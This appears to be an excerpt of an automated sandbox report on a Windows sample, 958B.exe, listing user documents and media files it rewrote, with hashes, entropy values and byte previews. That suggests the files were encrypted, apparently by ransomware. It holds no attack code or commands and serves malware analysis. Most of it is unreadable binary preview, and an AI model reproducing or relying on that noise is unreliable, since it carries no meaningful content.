Preview:	BJZFP....:...QDUG4X...8..\|..oE.Y........3......aDE....]<...M....,...y.ZTC...8._......d...Jht.p6As.;..j.x..}.^n...,_xN..B..\Rp."....c..^^....0..\|t...O......T.%........B.K...0sz.L.?(+...[........q...xe^5......&......!A....k...(.nDo.!..S.b...0.............sU)..E C....lJ...!..L}.....k`....J8b......)..@....+{.)2. 4.T..-WEl...!,H..)x2.Q.X.....2...A......C.....+.N.x.eV....N.(Uz..,~.c...Ui.u1&8..>!..._u...a...=x...I...n.$..N.?F.w.......~.......h....p..nX...^..9.....Z.sl.%...,.....pa.xY.oS....n....)....y..^..=[..U.......>......\|.2./.S.....!C....S....@...s.h.:.B....c..R. ......Y.0A.....{9..]x..E..-._4.q.-.2\..X.%.\z.....KO.Gte.N..............;^1....`..... 2....HG...=%..^Q.U...mH.."k.s.o.!.g.v..#....l...............9.....(3>.'.`.ht{....G}\|t..9......;.:...t>%..1Z.uj.......}..V,....t.5{......5.K.I......:9T..9..Vp.YF...W..]5f>...3....H...I..WTA)P......&P.0Pq<;Ka.b...IY.<.ZF...u.W....ds.g3.I..m.S.D.3......C...?.x..8../7...NI.....8.yH..8.

C:\Users\user\Desktop\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863355493970438
Encrypted:	false
SSDEEP:	24:6jGj2m9xxaLwi/Rq0DEHjAHR0dLc1qk5gYfD1zIVDT8GOgt8bGabD:2Glpipq0D4jAx0dLc1qbYfpSn6gt8brD
MD5:	B4551C6F57DEAE05AA53C5785747BE29
SHA1:	243004CC440E7C6DB0A95FA09A86CEA6304966FA
SHA-256:	CBA754C291B0530EBEDBF34834AACEDEADDC1771C48BC36EEED824E6D93B192A
SHA-512:	17454EC82211562FA40FD47D061AC61851DA3C088CCCB14B953DE5DB20DF104031AD0ADAA36757CEE5816DE0D560EFBA44B78D6494789154C6C2ED16597D2A44
Malicious:	false
Preview:	BJZFP8D6RH.p.[)..t....._Y.0z...._..5.Q.m..n. r.qb....&.....w.....n..cS.K.-5.fJ......9T....U..}\g.C......b..3.X.Q..._?.`.8.B..en....J@...."...P...9\2.`.P&...$D.@p..VM[!.........G.+...@x.<.M.s...C.U.m.Cqd.=.-...i-....J.>.T8F..#..9ww#.t..dKtMT ....i..>.Q..0)..B.Y...6......"k.X.b..6V.vm.j..%...<..?:..$G+....d.\|Z.2..tI........e.<`1[.'..c.....n.z....Zr.....{{....'..K.):..a.........C.o...&..X,8\.l.....;t.1=.D...wq_.f2O..........0.7...8:(QO..g...<W&.....\M.l..x..........w.#.&..~..?.....%..r..=.j...l.%..C..@..y.]iD...0....S..~V0,.....6'!..(..^.....+........\|mL...?.8.4..UrqEa.OM8V.........`y....=...u...k...B...L..._=.m.&.R2....Zf\C.C.-e.5.k.[.7...T..w...O..J..:0...G..d.@q./..../..N7.[.[.C..T..p.Nl...l....w....... 6O.p+[..#."].G.J....#......<..E.B/...m...N$..VgjL.....y.Oy..~...?..(l.Z.y.z..!\........P..lfg...pa...K..H`4:..,.?.v:.\|.......}.. 5 ...p.........6J.v.o.......H....+...3Z.....J]....Z..."oK3.K..*&.,L..yK.lb\|..=...

C:\Users\user\Desktop\BJZFPPWAPT\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844304723083599
Encrypted:	false
SSDEEP:	24:oPN0b0A9o2se6VJViDQ5a8N+QdnoCioABSQqI3eaxowjaPGi7hkgBQIlwM2MbGaX:ohAa2KVnwQA8MbCbABqI3BveP3hkElGc
MD5:	9A8E12FEA38269EDD513CDE5FE3E4F6A
SHA1:	066E1DD4DC0A4ADB9026E4653CCFE0C9DBD939C1
SHA-256:	5E06BB409524BD81455F5B043A38B3761F45ED93B125EE71DD8189D4C6B044FB
SHA-512:	D318AF6119E9F551E677C332BB8D8166E69D7DAB52646737CCAD9B0B9111483C021786DDA0AF4F06C50B39BA14F2DF8A3B26260DD722E95D26A860A4728B148A
Malicious:	false
Preview:	BJZFP.9.I.....a~~_...~...FZ.......,..Y.U./zA....../.;jmK2.T.....}.E...F.l....p.m..@.M.......9)]..W3....e.L...p....(7u...?h..e.q..Lz.hvE8.=..0.1.Q.cYM=.H..58...s.#....b.~aO.....CD...^.H[6....x.?).X..P.C............a...y......F...CF..b.%....}.M..Gj..s..7..O...E....N..6.(....h.k2}F.f.Y.C..\|.>8=...KAl.......NH.!.;...$..lqL"..3M...sv...P.L.zp.>..5...2.P7.w$.F..)C.}O.I.....d.n6.9\|%.$.H..D.......=.....t.-`.~f."Y.....N.a.1...;(=..$...C......E.l.qY<...\.t....E..7..@..!.PD.)....UR...'...lp.....[.....GY([7E....h.0Q.uu.x.v..E&...J...f..o..T...v]3...s-..<.9..QI...... +.."ebA..$.#z............\.&!\|.6.b P..i.L...7MV....]...\|..q.-^...Q<...../,x_...tL....~z.%rz.......}..m..X6..[N......)...1..S..@R..G.v.....u.;.nDT\|.'.ZK.1....b"......L..S_...aV6.!...F.<......+..*.2z....:..t]Z/X...@.4w.~ZIL...x.t6...f...b.c7I.._.........Z..m.n.P.....@.y:..o....Di.bh.$..D.p0N..u.7..6.c.2T.F1. .V.yie..E.L...<.....L..@.+..h.....q....g.GWq..7.....=F..!.[.=.2...p.l..u.-...[eK.oM.;

C:\Users\user\Desktop\BJZFPPWAPT\CZQKSDDMWR.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864255085751883
Encrypted:	false
SSDEEP:	24:O+Os90S1nCp3ek9A1fjxxKA0NESCtSEyc128+nRnOIaYiNuVm6HhwhfBnYAWx75Y:O+h0S1C1rAJNcA04SEj8nOI5kMhw5W76
MD5:	722D4C4B18F65E6F5E65147C8E416D6F
SHA1:	60178E86517E7E46585D6CEF80C3962209F67C74
SHA-256:	88D8A589F78505E90532312BB4169E118496102E952D497FF4B40450A306B167
SHA-512:	A33A5E731512A72F8F79BB7BEDFAE784D99D8E8A49C85FFBC7C0CCA7F1A849FCEC629B5A84EDD58FBDEC01AF226FF0BBFFF8B9DA93F593F35F974A614619F0C7
Malicious:	false
Preview:	CZQKS.K..t,..=..!..N.P.m..d.n..+..~.0Y.&.H3."o.sI.cC.hS.NE...u.....\GvO...o..V..}.f!..'3w..x.c.N.._.y.\~J.x...y....x......].Oa.Y...h.[.7i.T..D...r'..mXZ..(........$....M.Cv..:...`%.7.D.......`.&.8.....zy\|SE../.......}......Q0.....P.n.&..Gh`...q-...9.2..s..].T.$.0...7.v=.`.T...:t..=.M\|...T-...N. X..e..C...5...<.S........Jl.....>$Q%..D...4..L.'..S...9{;h.<.g....t.........$Tt..^...p+...#-'.q.s...LP.`k.......=...Q...pRP$.........@.h...$k.Z.<.vwQ..Kk...\.Z......h......Y(......W.K#..V..b.....%..o....$..yW'.......3.b...q.>..-.`..../XDO.z..aN.P".9..H[g.1.&m...i,.X..Q..T%...Jt+.73....3S.h..2..p...A[u..UZ.D............."....<.-.....e.p.B....O.).GT.@....&.... ....]s..D.x..T]...\|................{\..u=.Z..O..O.....a.\Pm....x>.E.....l.8&u....\|E...cw._...x.Z..` .^.~.Og....VI...~.R.f..;....[]@.)D...3.&0.b...?}a.x9...Z...s...6..R..A.+.>..P p%.F_..l.X.....4.S.P.F...G...f_.\|....s...F.G..l...cv1`..o..(1.J,H..a~^..N...8..<.1....6..%...kk"#.^.9.Z....}j.

C:\Users\user\Desktop\BJZFPPWAPT\EOWRVPQCCS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8812243145819245
Encrypted:	false
SSDEEP:	24:TMyKJOe8o7tY/eR20UdHY4MHMGHR9ZerWjVNA+EA4df/kyCO4LdPNtCamyQeibGE:EPtCEcohHR9ZerWj8f+LdCjhbrD
MD5:	9EC28B0A22D830118346D16EF9BDE346
SHA1:	9220D6E40C2823767007638C8EFDA2F237E4E039
SHA-256:	D2EC6A33D01BB6C35121636A9BDEF2F940296ABFE2DF4847032906125CB34376
SHA-512:	902C44004A5FCB7F293DE3BF455145A503EE5AA0A03053F3A514D2772F05FC3907368C8497B3AEEAB9426CDB7BEC397E6EAF1CCFAA37E39C1CF6A2C486F260AE
Malicious:	false
Preview:	EOWRV.0`=...G...h..m.#).......o.NF..G@..n.?.j....n..Q.T/.C......t.O.".D-......M.^.;..<.]%k...wj..\...>...i.........J5....~.G..0..........o....w....)..y.[.1...H...E~.H.....\|.f.......{9a...b0x\...`.........N_.....G.v....)..........Z.Sd<.~......F....Hg.......L.@...V..a.#:..n......a.B..x...0..y.:.......7.BiJ..tM.[.L.,{..0.kg.k.M..e../..Me..)..\|K....].v..M.b...f..:\.*D...4.............G+....$.].....CO....v'...~..~.+.....DrG..F%.V....a...PXj?...o...7..i.....R..7..g .x..5........0.)(...-..j..'O"d.....\.0Nn...N...I.4.j.Gu.PH.#..1.9..7..."I_d.o.u.......-%..!ct..t...%s.Z:C.a&g.j..N..(I".)Re..}B ..<....8x.....;.l.......fN....~..L....mc.f.k...`.H:E8.}..KM..>...S_.pz..;UF..U..I.h....UI.V....nz3(A.[..>DK(>.......~...T. Y$..0..}...y.{..ck..P/.....Vh.W.?....\|..........W@.h..z.zE.....-.P...`;.a2.6m .U.g..v....'O-...r.w...`N9.{oq..S..w...=`..;.L}..OX.h u^.../.T...h.._..cs....K.>6...\.8........Z.\|...3..)%.......6...t..-Dv.?....&%.......$...

C:\Users\user\Desktop\BJZFPPWAPT\EWZCVGNOWT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833327925475907
Encrypted:	false
SSDEEP:	24:JyEW54YasLQVBStkEDNelGu0gOqmufHHk5kRaxa47/Qrnnh+DxIm85QbGabD:gEPjqneM/gDmufk5jLQrnnmx92QbrD
MD5:	72AA87D94F6666BF84662A2C909AD8C1
SHA1:	B402570AB90DD4C0A6EA2D6F295516466ABFD01E
SHA-256:	E16C136E5CD04B166710426B77AC83B03944C33235B44FFD53B09657C9B9D837
SHA-512:	4E036F17D35F98362ECD4E6CAC1DC0BD701474E25E07FC1C215302B9E5342C017AB07063D4E934D02E5C5F997071DC2C9A8492DD3A47225FDF76B7D459298434
Malicious:	false
Preview:	EWZCV7..@)....8I....HA.Zow..M\|.Cz[.=.K.@.....pD...H..7t~._'..Z,.N8.u....C.07.A....i..#......X.........A.......)u..B.......c......w~.....]..3._.%.tj.n.- f..UD..s...xj.3.?.nP..WW.$0......1..Z.V..j.5E..Q..j..h.p..\W'Z.......l..`h~...../....;....)A.".>5/i...\..O[.?._...b....n...p.D..hym}.;....>`.T.@W!r..:%.O.3._....d....$#"yE;.VU....:......B.?.J../.O..\.)..0...n.v...(.bI7..%.v..?pi..F+f.p6..N+'.1$...%ic.".%.$.,..,.M.P#....X.wV...N..r..j.?.B.......Zk..g...=R.. .....&..c.v..Z..4..t.lXe..Qj6...?...m.<m.k..G......Azp.?l.@.;.6...e.f..3.o...6u..\|.....D....z.E.W..6s....W....W.@..I..5..&.[&.$.iC)A1.00BA./....9..8~bA...J...22...@..-....vK.4....l....v..kY.IG...hU...F..x?0.sg...=?....0..^..]..?....(h.1p..!..8.o..Z.jV...b$ ..}.r..$6P...1.B....Q. ..g...4\|Y.>f.-..]X..PsT]%......8..O.N.w...\._.s.".F.Uf.0S... A..Q...z.Lx^}}1g.s)....._.^.&.$g8.@&Z..>..viLj..(Yz1.1>..t.h.....~.}.......y....-.<...j.\|+t5..`&....MyBr..{$.6..c?....hVH..Q)q.....h.^.....m.

C:\Users\user\Desktop\BJZFPPWAPT\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.86208158860434
Encrypted:	false
SSDEEP:	24:SQb6brfZSeNOe73jmvJHoxintCj1nclMZ4FXtc99Tu9LaAkIsWKJpwdeMrbGabD:vb6BNmxPt+1CMZ4F9Y84AxSpwoMrbrD
MD5:	32024E7B019FEAAF05D502772AE28F67
SHA1:	E9A4DFD488497DA2F7D365B256E19B3DACD2F365
SHA-256:	1CF450FCD49FD100E10CBCEEBC4AF145C7BF0847F12D1E736DD51D082E02C00E
SHA-512:	D2DD29CE9EB8EAB3DCA061153F1EACCACBA0662A22253265757EA7B965A8714DC3B709009A74ECB9CFDB8CF7B7EFDF4C0C011C0E24B1B0245053F2C09324E4FD
Malicious:	false
Preview:	NYMMP.b..yB.tj.%f(2........s.X......wvv...R.H,..!t.....m..Z.,...~P..~...I.......Ai.9..y............u.`.=q..#x;&....w(....m.Q.#..$...U...Z.g.o.IY.A.:8{.Qe..$n~..4...1..P...W.{.l...T.....`.....G.o.a..P........W\|.om..VU.Za......L...h$./.y.....\|g..tH.P"S.Aq<3.a..CCc.<dF.IG.8s....[.`.....#a....s#.{.1.#-IbF..$.}n]..RI[...E..T9P..?.......&.Y.........mj7q.x..x....a#...O/...{.q...k..=vk......q.th.F.0)Q.lE.E^.q.(...L~Q}"g.....di\|.c..V.)13.x^.e.....;&....'.p...."....4..G.s...."..v..O..8.G.c..D..-..Q.`...}....+.z..(.&........&59..B..9S...$,2.&.......T.....~G..=...7f.h.J.8.Y..S.t.Z..B.Z...b..8=.a...w......}..<f..U.}.o".c.u...]Y..&.T\|..;..L.eDU.x......^...G^..{{.....~..f.).&..v.qw....TJ........./.Q...d...Rf..b4.ve....3D........ois....4P.;K..W.(%......Y....3k..4.I....u..Le....R...=...}0.Y....4..?.j.@..#.M....qH.n....S.qh.3.......f<O.$Smj...K.2Hm.W0..q.q..>..._..L.j...r......>'...../....f-...x..l.......>E..5ym)..]...m.0V6@.......T`.p...?...o-

C:\Users\user\Desktop\BJZFPPWAPT\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862488673356208
Encrypted:	false
SSDEEP:	24:mywyp7aflNyHXAS5HA+YPsSaqvBRxD793Z5d7CiKp2vrqI38GQGMd5XHx9x1MLbH:m8pmflYHN5SPbnpfD7hZfCiKkrqm25dw
MD5:	B3BBDACBCEF8B32D85168CC5F7428907
SHA1:	31EF0DC24A599436400CC2AEDFE6F81ED911ABC9
SHA-256:	83515C648F8C638DDFCB61850C57A4D3AA35DEF883C192A5C059358B24DED882
SHA-512:	74A9C36251758DD2757A149C22EFD755A2DC506EB1BA0775BD6C87ABC67BE1EDCFD21CD62129D69C245A6ABC59F902EE35CEF57806B825DDA39F315E5B3C4AB1
Malicious:	false
Preview:	TQDFJ.....?H.h.t...U....?.jY43..J._..o.../.._\. ..3.V.\|5.....I...1.+...QJ.G .y.P6.........O.Xp8..Ed_..Pi..Y..C..=4.$........@P...H.~......O..l!...?...z?$.$........'wd>.O.aX7;!K...{O..C..<.DIi..X..b.g.D...#...._.\rO....P.J.Z....l.VE.+..\.\|PT.{.&.]...`...].JC..7nr..+..;o.>..l..q0.~=c...v.DX...x.G...sa...&K9~.l.{R\]j.......)>.aRX.i.v...H..dd..9..&...,.\|.d?..\..Eh.9...te(#....C..._....Q.@....;......}.....!.QX.....<...&k.[f2.b...h.1...{6y..:>...o......hN.t7OZ.o...P7<.n4...mV.....?...)5.,,..7.%..lL_.S3+.h.w-.Q@..o...Yb...!./.s...h[D..1...(..+...#S.%.Q.O$...o9r][.3.z.j~y.".j6..q'.\........4..X%..p}Ct..4.S..{0.`..1#....o......B.Em..o.....d..&.x.1.n..%..r....Zx.D6..s..<.Y..).Y..I.....%}UQ.Z....O......b.....+bq...G....t...R.o..'QM.\J9~..40q.F.W....%...s%o8.....k.p.......Y...........=....9...T.9.HN.....g.k..R.t#...`.w..M6.\...n....Ga..d..l.o.c.hk.r...hx......XKI...:....DG..$1.....sH..h..n.P.OZ.;.j..m..j...W.................IZ...n_h#j.4.).

C:\Users\user\Desktop\CZQKSDDMWR.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.835771299050823
Encrypted:	false
SSDEEP:	24:WxDAni+qWIZs3ysGZ4w/vk0hJsmCph2FUlZYtts6kbfDJX76zgSwq1pY9S7bGabD:2DAiJWIZTsOnvk0cmCpPYzs6kbfDJXC9
MD5:	556154D710E65B8FC88766CCE0948036
SHA1:	BE4F78E1E78FCABC12545C4B1A022CD80032D1C4
SHA-256:	E9369DCB4BC398DB5A2158CE4FDE2E85F6D606EFB21647C59E45C33057E33477
SHA-512:	3972E103C35E602CACE13C01CE77974BAA97EC7AD0836E4FA5DD9F5FB85AC5A4BC78FC1BAA954AD03C0640D5D7A6363DE658B9F7B18B6FA3DD1F292C87BEC72B
Malicious:	false
Preview:	CZQKSvk..dR.2.....f5i....._z.[@..r9...9.k..AR.....PY.w%!\|.h...C.Y....x..%.9..0.......,q......$r'Xg.-../...<...%..r3..R....,.J.KLp.f....".!."\|.\|.{;.......A[V...%&t.D..&m......=Y....7.#..:....Z....w.^Y..0v.qEm.XS....A&....m...t.....m.9........q.E.C..F.f.>....A..YJ..F5.i..s\.^......+.$.....I._.c.l[..:..6...6:.OQ....~....7.\...!...>..\|.x...u..0.4...[..G....R.@#.Tj.f...^...h....w..2].,..g}..'N...Y....x.&..X3..@.....v.t...NE.t...9$\j..\|.....^........M.e,..Sm....T.po..n.."G.C$....... ....y........M...4u9.!KE....Ka..3g.w..g.u..%)....y.f..+8.....=..:..e.b.9C2.2C.....S..hv5Y=..k._FXqT,+!t.er.().0..\k].<N.<G.k../;b....f8$(..a..a..E >...tZ..>Em..6BQ0......Q..)..D.&........i..:..M.V=V...OHz...)O.y.....2...6.A.G ..%..E.9O...E.r..\n..QUf.S...q..~.S.{.KLqS..r..}.y.Gq....o.s.{..w.....K...NC`B..3...I.h..H)./.....;(.!i......x^..(.A.e..E...%8..h...fw..t.`3....U...g..2..&s.].X.A;.0b=..y..._.......B.,.5..9l.....cR.G...>%uq.S.07.6.V.h....m..V..<0G-."3......@

C:\Users\user\Desktop\DUUDTUBZFW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843446689848263
Encrypted:	false
SSDEEP:	24:sIqubZP7PmibGX4yr7Btv/JnUQW8hnl41xRQMCTIKpw82ddNsKrPd6XLUpbGabD:sDYZ7OxnBZ/hfW8hyrm5TIKpYtrPd6XA
MD5:	72080B74802B339FBB5F45CCB53FC309
SHA1:	E7058C93B47E2021F467C564D6E84B879008960B
SHA-256:	0A024E8275F1CDABBB2232DCE6389CFCE8E97FF8E0125AADBBBDA8B1960944B3
SHA-512:	840433566D56B20D3704F7E0FB2D4C4F14AF68EA85A36AEA50A11F3DD0D90C09D6074EFBF872856B84A1C01662835A79CFB97499142DC8E1FF2AAD5A7DD4A086
Malicious:	false
Preview:	DUUDT..m....N$F..g...E...N.....Z2...w.pxl.L....s...P...(...U...$..@.......n .Sxr7.....j.2r-."U.!J.m./..85.\..c..s?&..L]..4%...U..y&.Nb.=...2.!Mb.Gx_O.6B..y^$.'......FR}o..'n......&..s..3.k...?..g...`..E.\|I....f..n....C...P]'N.&rOK,.O...v.,&(1.F.g.Jz......:M....g.Mk..'...SQ.....E.u......7.).ob:..".:=.....5.8..j..=....hH)iP..db.....f...;\|............k.4l...KVx.oF........)~...S.-.g".^Q.,\=5.9%..k.....~i.M.......\|cr...0!...3.>.-).....t......=...wz..s.UU....o.N.+.9....C#T..N...V.L..P...]..h.W...[y\.A.8C.N.Q.t..n.....E...._1.....d..e:......NB.k&.s..e..cFM.N....0f~ ..d&.;K.i..CG..r.T..~?K)-D...f.:.'...b...yS...c..l1!..f...7.jJ1.T.g..e...f .s......;.?.....7..2./u...0..Z..?..vf2-4.i5R.K..9.....3.f>..6..QO..x.....t.a.>?..Ju.....CB?~b......(...HF.iM.%M..E...G.\...Q...g.6...t@.(;ks......i.<..n.[f....mU.!..$<v..X..)....'j....^..}.I.e...<..71.......[........"t......iiJ...3wp...MB$..p ..T........&v.......B...6Fe.JiV*=9...2.f..la?.e.....MK.....`C....../.Z.8

C:\Users\user\Desktop\EFOYFBOLXA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867847362249816
Encrypted:	false
SSDEEP:	24:KGL667unWls9bPc35ElRnQcmREcfAqKO1FMIc9W8iZ5i12wHaPlbGabD:KVsls9bPc3urjXcfZKO0Dg8ILgatbrD
MD5:	4ED506A3870ADC1BA87E619A34F2AD1F
SHA1:	E82FB742041F1F41FCF125A7CCBD083FC909C03A
SHA-256:	76EC0F4544B053577F0A203F8BF98587B1F119FD0401511DA5F7636D65BAB62B
SHA-512:	9B5F9E4055EB5C0C829FA32E885E4D9B81C7AB738B81FC850709AFE51B029467162DE2B3DD71266A7F0F2DAC60DD54CE81EED04F6450914DC9A788F81FC8F380
Malicious:	false
Preview:	EFOYF.h..g.$.bVR~j.V1.....`[.fW....>O...f.....a..r."\dB.9q2.>.~L..l.t..jf.....J.....J......s.'.].8.3F.....CH..d..9$..B....v.....9C\|_q......\.X...2(......G...8g.f.[.....W^....U.vk\\.)..=g....S.".W.:.=..Q!...u6.]...r.Fn..."..k0R.K..N0u..t.2...M.....e.......u..[2......Y.>.(.Xg......s...+.7...t&V@\....I......G..H.(.n....`....m8.qM...`.a.iC/.r^....A(R...?.Vo..'.v<....+..o.A.A.p..."A}N.<..3...PC.@>'..`.nr4.........;...+...m....>...Gh..T. .i.%.w......#d.2.....e.?!x...)....v..J`..."P<.t.B}......x^..Y...Z..x..2.o.{O..lu.....y.m...w......Jy...8.c....1.*..8~..]..5A......J.P.U6.F.o...BiZ..e(_.Zg.i.7.H5&A#+G....K1^.A._`......1x5............N.Tm' S...QE.F7W.e...^....L.C....u.....>T.i..jdg.\7.a:..r...n....<..A..pRju.R.T.P,.C....E..+...@y..`.y.A...G..)...7...$..&.E...2.n.vA.Z.&..7..4......P.y..5.!m...2.)..a...."]\E@....v.?...\|.n. .vl..\|....X#.f..R.1d=.@.....`..3.w..(c...FD..........~..6...B.R...H./.".E.c..d?........o..s.U.e...=.P.}s.(jn.fU.y.Q.m..>.

C:\Users\user\Desktop\EFOYFBOLXA\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856609315428168
Encrypted:	false
SSDEEP:	24:P8VSNSfxj67+yLr1y38Y/J7gRpeBFWUJPYUdTdwnThCBKaIdpTsjVa0bV2pNppbH:EVSMxjUY81peVAUdTWnYCdpTspaIV2pt
MD5:	DBEA1640EA858407CE571A955A4EAEC4
SHA1:	CAF2864B4D2B4E37B483ADA927D43CDA2CCEC56E
SHA-256:	B9B5D561180F3C1FFF78379E73391451024391874673FFAC8FE1BFD1CF53CA47
SHA-512:	46F958172F75B8BFE204969CC6864020C39BC52D74D5C5C388808D82ADF4297FC8A162A0418CA0A8516C1E5250D92A5858B10CCDE8626606B708D2C86343A238
Malicious:	false
Preview:	BJZFP(..:..Y^..R.3-.....r1.1....\:..Oc..w.<.g''......\....T7..<./.4..]>L}..j.#J..$......\}..2}6...0..w.V,.D.....`..P.%Bz;p.\..pw.e....,.......o^]'1.....].o......u..$d..=..l.r...[...+.z.sC!.4.......`.\.)z.+.a.W.m\.5.$...2..w>..q`.b..F.lP....bv...........Jh.....m{...o...>..6.R'=+.c..u..^0...,j.,.+J..'G....r..:T.o9.H...!V..B..{....,[...Rz\|.u...........q..U.A...F.f.<.........71..`=...x..^...=Z}..KH9o(\hkYK.yK!4.....a.c..7......V.z,...37..h...6.k.!..W.u+...3s9@...9I.........m.2._!a^.....J.p/P.M.P....!.q.c..h.3..2....Wp.fp.`q.CB..N.7J.......D.B.09]...#.3...n.bB=......l....:...w0.s...f..D..~}..2..IX..s...M..T..N..%/....7..$&.....8.f5.%a.Wq.G...J..S...s&.L..V..d.\.-...q.y..sm.x!.....S.e.;..6.'......jX..`...\|.dq.#...1~J....o=b.Y7.......{...;#..U..iUg.l0..{%V....7A....E..6d.-...G'......]Y.+.....e.\|.....P. 9.1.zY.jo..sl.k!i.j`..rX.2.k..@...<.....p....\|1.E.M...pX........3;@"..'.....QJ...{B.u.mS..l[...;.[....%.:.y.&\|..b...f...4......S5\....l

C:\Users\user\Desktop\EFOYFBOLXA\DUUDTUBZFW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8336498842651485
Encrypted:	false
SSDEEP:	24:D+pD4OpXjYIXsYJx0+D7x+zXkv+DtPFeWuKw5LyS/4v/zToBMxWTVyoux5N4bGaX:W8OpXjs60+v4oq9eVKuLv/4PrxWTVyoN
MD5:	3F948087BDD4E1B232369B600ABA512D
SHA1:	BC69A5E682D431F31E521E9073E082D7D32F880A
SHA-256:	4084B98872C44B908AABD9F8C83ACDBB10876A43622E985E2BF2402838AE4F25
SHA-512:	2474BF0483113642F8E48410A55B0F390F5B7990B3E147A40CC63643871749ACB16ED88911A8DFFF9C9A2948D7A988ECC882ADB05DB01D278F1DE2DC832DDAD0
Malicious:	false
Preview:	DUUDT.Q.w-.$zSM.. v.W...d.....VH....F........2C.....W.2... ..T..Q.......d..J.!'.......u..m..l<.x.0.B....j..u"...O.9.N.)..1.4.2..l...J...;.(........R^gHQ...k.L.....D...L...v\|.kh.EX4\f(.Yd.Z}..oY.l.A>.@H..C....A..e5.!F.....>..{.B.d....&n........_.....>.\|..a..@.rL.uH.S..:,...#.XO.\|.3.n..}..dl..3....h.j....".....v..`.........gB......>9[.&..'M....m....F...\|1.`......>P.)...jwa.....N.......\....k..h....B#..IN....Ln~h#..........M>D....G.e...cKk..zZ..#.^g.#.......^>.r..+.0m...w.....3~..M5....H.%."..u.....6(.b.69..d!.+V..`D.9D.B....K..W.>....(..b..I..(3&...3:o......F....W.X.e....:..u.n>.cb..Ot..Z...Z...O..;.F.E.+.J.=..r6O.u.............n.u..S.... .\.oshu..I/....M.\|^.s.'oW....k..T../G....JQ.K.K...^..T.C.a..X....0=.......P.cg:O....V.....`..1..;B..$.p1.3.5..\|I.....c9..m.......R.U...^s-D..e.k.O....}........v.6.7.)d..&..1.<_..m:2.u...V.........C!e8.G1l..1..`.:.I{Em.vv.;GF.........2U]S.h..'...V.1.=._....l.....%.p..#.cf`....P.E8n...RL.hm.....e.X..H.

C:\Users\user\Desktop\EFOYFBOLXA\EFOYFBOLXA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856067928561779
Encrypted:	false
SSDEEP:	24:V/1Dzpsm3iBzIr7ttbSQsJKSdlkZqlQCKhYtVMBJWfjSKUyEceAGmjyxvbGabD:VrhQKZq6FUp5axmjObrD
MD5:	DB725B04318DEEEE3CA3008503F62906
SHA1:	A1A58D59B2CECF855762C4E9F9DF8B7BFB8F5852
SHA-256:	9B652EF032C4BE849E0217180BB916EBE6442CDFE101976720A9243D1891775C
SHA-512:	F387D6865D4F7A5A21332803E4CCACDD0E291E07B814BAF18B30F7CFDE94AFC3DA46E1755A73B716844E2ACE9C9170C1344EBBFB2122EC65D2F69DD14B98F6B5
Malicious:	false
Preview:	EFOYF!......f9.N.\|0.V..E .K.w=.......oW..,<7,Z(./......&.... .v+Lb;.`."%....Iv.tK&.z..Y..}..\.........5y$...-..0~.x..@.........;Qv.Y...b..}a...!...GQN.o....?....r%!PL.-..l.....,..rK2..NY.R........$R....K.Fh....n...b..Pd.H.J..~).c..I...f.../g..ye.W...5A(.....!.N.DB.j.....\|2.w.5.}.+...c-..$.?..+2....HA.&+AW7..V..=+....e...L.....ol#.8&.4YXi..Y6Z..0...F.c.....Uz...(....}F.Jj.%..C[....$."...T+\|..q..R.P,=.&`qsn.(..T.R....\|..T.b].....f.....H..q...7....=.*.k..h.r.=..P^.S....@...S.4..B.w..!..y%n.cN]....#"...:B@O.@.B.5..5......cOg...w.>I..D.YG.ZZ[....2B.x.b@_..(....N..d..y...5.p.;..V.G...{...U.ig.s[..B.....6...h`...0..7''\....-\....B.Ft(..c.?........&..".V..5o.....p....s...w....r....p..JIYI..C...........Am.s...A.J..g.....='.....(!oKFCvK.p.........CJL.........HQ........\|..."S..'Sq........ 1.LO"/...r.zb% `>jj^.....Jx...<.g....1c[.8H...Ua+.%....g.G..5.7....$..D...`Th.l.....n..7gU.p.A...4.w+.'.....qM....:..!.;.5.I.u....a..IS%....$+

C:\Users\user\Desktop\EFOYFBOLXA\EOWRVPQCCS.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838257431103253
Encrypted:	false
SSDEEP:	24:Um3DegNZSL4Yyi2JmBZ19gibSrAEer7CVQIqsXOso3r+fGOATgP+xbGabD:jiWeIi2JmDDSrqr++IHRUkGvTw+xbrD
MD5:	369E02C60FEA6369FEA7FC14AF76C99B
SHA1:	BECF449A98C683AA4AEA840A0F03524742340042
SHA-256:	4E1512607E969D1015003EDC2CDFB72052B74F8B0A2BD0A188EF8611ED59E8AC
